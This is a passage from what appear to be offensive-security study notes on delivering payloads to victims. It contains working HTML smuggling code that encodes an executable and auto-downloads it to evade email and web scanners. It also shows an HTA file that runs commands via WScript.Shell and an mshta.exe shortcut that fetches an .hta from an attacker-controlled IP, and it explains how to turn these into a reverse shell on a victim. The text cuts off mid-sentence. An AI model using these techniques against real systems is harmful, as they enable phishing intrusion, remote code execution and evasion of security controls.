Email and web scanners are capable of parsing these out and taking some action. They may be removed entirely, or the URL content fetched and scanned by an AV sandbox. HTML smuggling allows us to get around this by embedding the payload into the HTML source code and using JavaScript to construct URLs by the browser at runtime.
First we create the encoded contetn:
echo -en "This is a smuggled file" | base64
or
cat malicious.exe | base64 -w 0; echo
Then the HTML code:
! Note that Google Chrome supports window.URL.createObjectURL, window.navigator.msSaveBlob method make the technique work with Microsoft Edge as well.
<html>
<head>
<title>HTML Smuggling</title>
</head>
<body>
<p>This is all the user will see...</p>
<script>
function convertFromBase64(base64) {
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array( len );
for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
return bytes.buffer;
}
var file ='VGhpcyBpcyBhIHNtdWdnbGVkIGZpbGU=';
var data = convertFromBase64(file);
var blob = new Blob([data], {type: 'octet/stream'});
var fileName = 'test.txt';
if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
else {
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
}
</script>
</body>
</html>
- HTA Files
HTA-based attacks offer simplicity in development and obfuscation, with flexibility for evasion. They bypass SmartScreen but face challenges such as heightened detection efforts, reliance on user interaction, and the detectability of mshta.exe as the parent process.
hta file that performs a simple ping:
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("ping -n 2 192.168.X.Y");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
This is usefull because we can create a shortcut file executed with a built-in application in windows. To create the shortcut file, we’ll right-click the desktop on the Windows machine and navigate to New -> Shortcut. In the new window, we’ll enter the MSHTA executable path (C:\Windows\System32\mshta.exe) followed by the URL of the .hta file on our Kali machine. Example: C:\Windows\System32\mshta.exe http://192.168.119.120/test.hta
Then we transfer this shortcut to our Kali machine and then we can create a Jscript code generated with DotNetToJscript, embed it in the hta file and obtain a reverse shell by only sending the victim this shortcut file.
We can also combine this shortcut with HTML Smuggling.
If we want for example, a hta file that bypass Powershell CLM and loads a ps revese shell, we can use the following code (The binary should be fisrt and must follow the structure of ):